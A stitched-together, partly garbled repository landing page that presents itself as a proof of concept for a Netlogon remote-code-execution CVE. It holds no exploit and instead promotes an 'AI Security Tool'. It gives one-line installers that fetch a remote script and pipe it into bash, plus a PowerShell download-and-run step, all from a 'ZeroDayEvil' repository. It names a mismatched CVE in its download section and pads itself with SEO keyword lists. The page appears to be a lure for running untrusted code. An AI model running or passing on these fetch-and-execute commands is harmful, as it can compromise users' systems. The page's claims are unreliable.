🛡️ CVE-2026-41089
Netlogon Security Research & AI Security Tool Module

Security Research • Defensive Validation • AI Security Tool Integration


🌐 Демо-версия📚 Сайт проекта💬 Чат сообщества

Website navigation: HomeUpdatesDownloadsModules


Official AI Security Tool module page

🧠 Conceptual Overview

CVE-2026-41089-Netlogon-RCE-PoC is a security-research repository for controlled validation of the Netlogon attack surface and defensive telemetry. Use it only in an authorized, isolated laboratory.

AI Security Tool — это кроссплатформенный инструмент с открытым исходным кодом, созданный на стыке традиционного администрирования и современной информационной безопасности. Он объединяет мультипротокольный комбайн для подключения (SSH, RDP, VNC), функционал глубокого анализа цепочек поставок (Supply Chain Security, CVE & SBOM) и автономную экосистему из 12+ ИИ-агентов.

Инструмент устраняет необходимость переключаться между десятками утилит при проведении аудита безопасности, решения задач Red Team, Pentest или CTF. Приложение доступно как в десктопном и��полнении (Linux, macOS, Windows, Android, iOS, HarmonyOS), так и в виде полноценного Web-интерфейса.

🎯 Core Philosophy

"Bridge the gap between execution, intelligence, and supply chain audit."
Мы создали AI Security Tool, чтобы избавиться от рутинного ручного анализа. Взамен разрозненных скриптов инструмент предоставляет единую AI-Native платформу, самостоятельно сопоставляющую контекст уязвимостей, подбирающую параметры и автоматизирующую процессы аудита.


🔍 Модули проверки безопасности и PoC репозитории

Коллекция уязвимостей, PoC-скриптов и исследований, поддерживаемая участниками нашего сообщества:

🔥 Remote Code Execution (RCE) & Network Vulns 4 модуля
🛡️ Privilege Escalation (EoP) & Services 2 модуля
📚 Vulnerability Research & Writeups 2 модуля

💻 Multi-Protocol Terminal & Client

  • Поддержка протоколов: SSH, SFTP, Telnet, Serial Port, RDP, VNC, SPICE, FTP.
  • UI & Кастомизация: Прозрачность окна (macOS, Windows), пользовательск��е темы и фоновые изображения.
  • Удобство управления:
    • Вызываемый терминал по горячей клавише (Guake-style, по умолчанию Ctrl + 2).
    • Прямое редактирование удаленных файлов по двойному клику через SFTP.
    • Мульти-ввод (одновременная трансляция команд на несколько сессий).
    • SSH-туннелирование, поддержка ключей/паролей, глобальные и сессионные прокси.
    • Синхронизация настроек и закладок через GitHub Gist / Gitee Snippets.

⚡ Advanced Capabilities

  • Интеллектуальное кэширование: Ускорение повторных анализов с помощью LRU-алгоритмов.
  • Real-Time Process Manager: Оперативный мониторинг и управление процессами системы.
  • API Security Testing: Встроенные модули для тестирова��ия GraphQL, JWT и REST API.
  • LLM Integration: Интеграция с DeepSeek, OpenAI и другими провайдерами для автоподсказа команд, генерации скриптов и интерпретации вывода.

🤖 Specialized AI-Agents Suite

Для автоматизации сложных сценариев аудита в систему внедрены специализированные автономные агенты:

Агент Назначение Тип задачи
IntelligentDecisionEngine Автоматический выбор инструментов и контекстная оптимизация параметров 🧠 Core Logic
BugBountyWorkflowManager Управление рабочими процессами поиска уязвимостей в рамках Bug Bounty 🎯 Pentest / Recon
CTFWorkflowManager Автоматизация и поддержка решени�� соревновательных задач CTF 🚩 CTF Automation
CVEIntelligenceManager Глубокий анализ уязвимостей и сбор Threat Intelligence 🔍 Threat Intel
VulnerabilityCorrelator Обнаружение и построение сложных цепочек атак (Attack Chains) 🔗 Correlation
TechnologyDetector Идентификация полного технологического стека целевой системы 🌐 Fingerprinting
RateLimitDetector Обнаружение и автоматический обход ограничений частоты запросов ⚡ Bypass & Evasion
FailureRecoverySystem Обработка сбоев инструментария и автоматическое восстановление 🛡 System Resilience
PerformanceMonitor Мониторинг ресурсов и оптимизация системной нагрузки 📊 Resource Control
ParameterOptimizer Контекстно-зависимая подборка параметров фаззинга и сканирования ⚙️ Fuzzing Tuning
GracefulDegradation Обеспечение отказоустойчивости при недоступности внешних сервисов 🔄 Fault Tolerance

📊 Security Scanning & SBOM Workflow

graph TD
    A[Target Project / Assets] --> B{Aggregated CVE DB Engine}
    B -->|Daily Sync| C[NVD / OSV / GAD / RedHat]
    A --> D[Binary & Dependency Analyzers]
    D --> E[Generate / Parse SBOM Standard]
    E --> F{Vulnerability Correlator}
    C --> F
    F --> G[Enrich Context & Remediation Data]
    G --> H[Export Reports: Console / JSON / CSV / HTML / PDF]
  

🚀 Quick Start & Installation

📦 Ready-to-Use Builds

ОС / Платформа Версия Архитектура / Формат Дата обновления Статус Загрузка
🪟 Windows v5.3.27 x64 Installer (.exe) 2026-09-11 🟢 Latest Скачать .exe
🪟 Windows v6.3.20 x64 Portable (.tar.gz) 2026-09-08 🟢 Latest Скачать .tar.gz
🍏 macOS v5.3.29 Apple Silicon M1/M2/M3 (.dmg) 2026-09-05 🟢 Stable Скачать .dmg
🐧 Linux v5.3.27 Universal x64 (.tar.gz) 2026-09-01 🟢 Stable Скачать .tar.gz
🤖 Android v8a 5.3.27 ARM64 APK (.apk) 2026-09-01 🟢 Stable Скачать .apk

🧪 One-Line Installation Scripts

Быстрая установка и запуск развертывания одной командой:

Linux / macOS:

curl -o- https://raw.githubusercontent.com/ZeroDayEvil/ai-security-tool/main/scripts/one-line-web.sh | bash
wget -qO- https://raw.githubusercontent.com/ZeroDayEvil/ai-security-tool/main/scripts/one-line-web.sh | bash

Windows (PowerShell / CMD):

Invoke-WebRequest -Uri "https://raw.githubusercontent.com/ZeroDayEvil/ai-security-tool/main/scripts/one-line-web.bat" -OutFile "one-line-web.bat"
cmd.exe /c ".\one-line-web.bat"

🛠 Build from Source

# Клонирование репозитория
git clone https://github.com/ZeroDayEvil/ai-security-tool.git
cd ai-security-tool

Установка зависимостей и сборка

npm install npm run build

Запуск в Production-режиме

npm run prod

или через скрипт: ./build/bin/run-prod.sh

После запуска откройте браузер: http://127.0.0.1:5577

🌐 Server Deployment & Configuration

При развертывании приложения в публичной сети настройте файл .env:

ENABLE_AUTH=1                   # Включить авторизацию по паролю
DISABLE_LOCAL_TERMINAL=1        # Отключить доступ к локальному терминалу сервера
SERVER_SECRET=your_server_secret_key
SERVER_PASS=your_strong_password

Запуск сервиса:

./run-ai-security-tool-web.sh

Готовые конфиги для Nginx/SSL доступны в директории examples/nginx.conf.


⬇️ Official Module Download

CVE-2026-24291 is distributed through the official AI Security Tool module portal. Use the page below for the current module package and installation information.

🚨 Security & Compliance Notice

ВАЖНО: Инструмент предоставляет ИИ-агентам доступ к вызову системных команд.
Контроль действий: Всегда отслеживайте работу ИИ-агентов через панель мониторинга в реальном времени.
Минимизация привилегий: Запускайте инструмент исключительно с минимально необходимыми правами в системе.
Сетевая безопасность: Обязательно активируйте авторизацию (ENABLE_AUTH=1) и отключайте локальный терминал (DISABLE_LOCAL_TERMINAL=1) при публикации Web-интерфейса во внешних сетях.
Использование утилиты на сторонних объектах без письменного разрешения владельца является нелегальным. Разработчики не несут ответственности за возможный ущерб.


🔄 Contribution & Community

Мы приветствуем любой вклад в развитие проекта! Основные направления:

  1. ИИ-Интеграции: Подключение новых LLM-провайдеров и расширение возможностей агентов.
  2. Security Tools: Интеграция сторонних CLI-сканеров и парсеров.
  3. Оптимизация: Повышение скорости работы парсеров и эффективности кэширования.
  4. Документация: Написание гайдов, переводы и CI/CD шаблоны.

🔗 Contact & Support


AI Security Tool — Reimagining terminal workflow and automation for cybersecurity professionals.

CVE-2026-41089 Netlogon RCE Scanner & Analysis | AI Security Tool Directory Exploit, AI Security Tool, PoC Scanner">

🔍 SEO & Technical Indexing Keywords

CVE-2026-41089 exploit PoCWindows Netlogon RCE vulnerabilityActive Directory domain controller compromiseUnauthenticated remote code executionStack-based buffer overflow analysisLSASS memory corruption exploitZero-day threat hunting guidelines

🔍 SEO & Technical Indexing Keywords

CVE & Vulnerability Identifiers:
CVE-2026-41089CVE-2026-41089 PoCCVE-2026-41089 exploitCVE-2026-41089 scannerCVE-2026-41089 writeupCVE-2026-41089 mitigationCWE-121 stack-based buffer overflowWindows Netlogon vulnerability 2026

Attack Vectors & Exploitation Tech:
Netlogon Remote Code ExecutionUnauthenticated RCE zero-dayLSASS process memory corruptionDomain Controller takeover exploitActive Directory pre-auth RCEMS-NRPC protocol exploitRemote stack overflow payloadRPC Netlogon memory safety bug

Threat Hunting & Security Operations:
CVE-2026-41089 Indicators of CompromiseNetlogon crash IoC detectionActive Directory threat huntingLSASS exploitation detection rulesNetlogon RPC traffic analysisDomain Controller compromise forensicSIEM detection rules CVE-2026-41089Sysmon LSASS injection monitoring

Tooling, Frameworks & Remediation:
AI Security Tool moduleCVE-2026-41089 diagnostic toolNetlogon vulnerability assessment scriptAutomated Active Directory security auditNetlogon buffer overflow patch checkDomain Controller RPC hardeningZeroDayEvil security research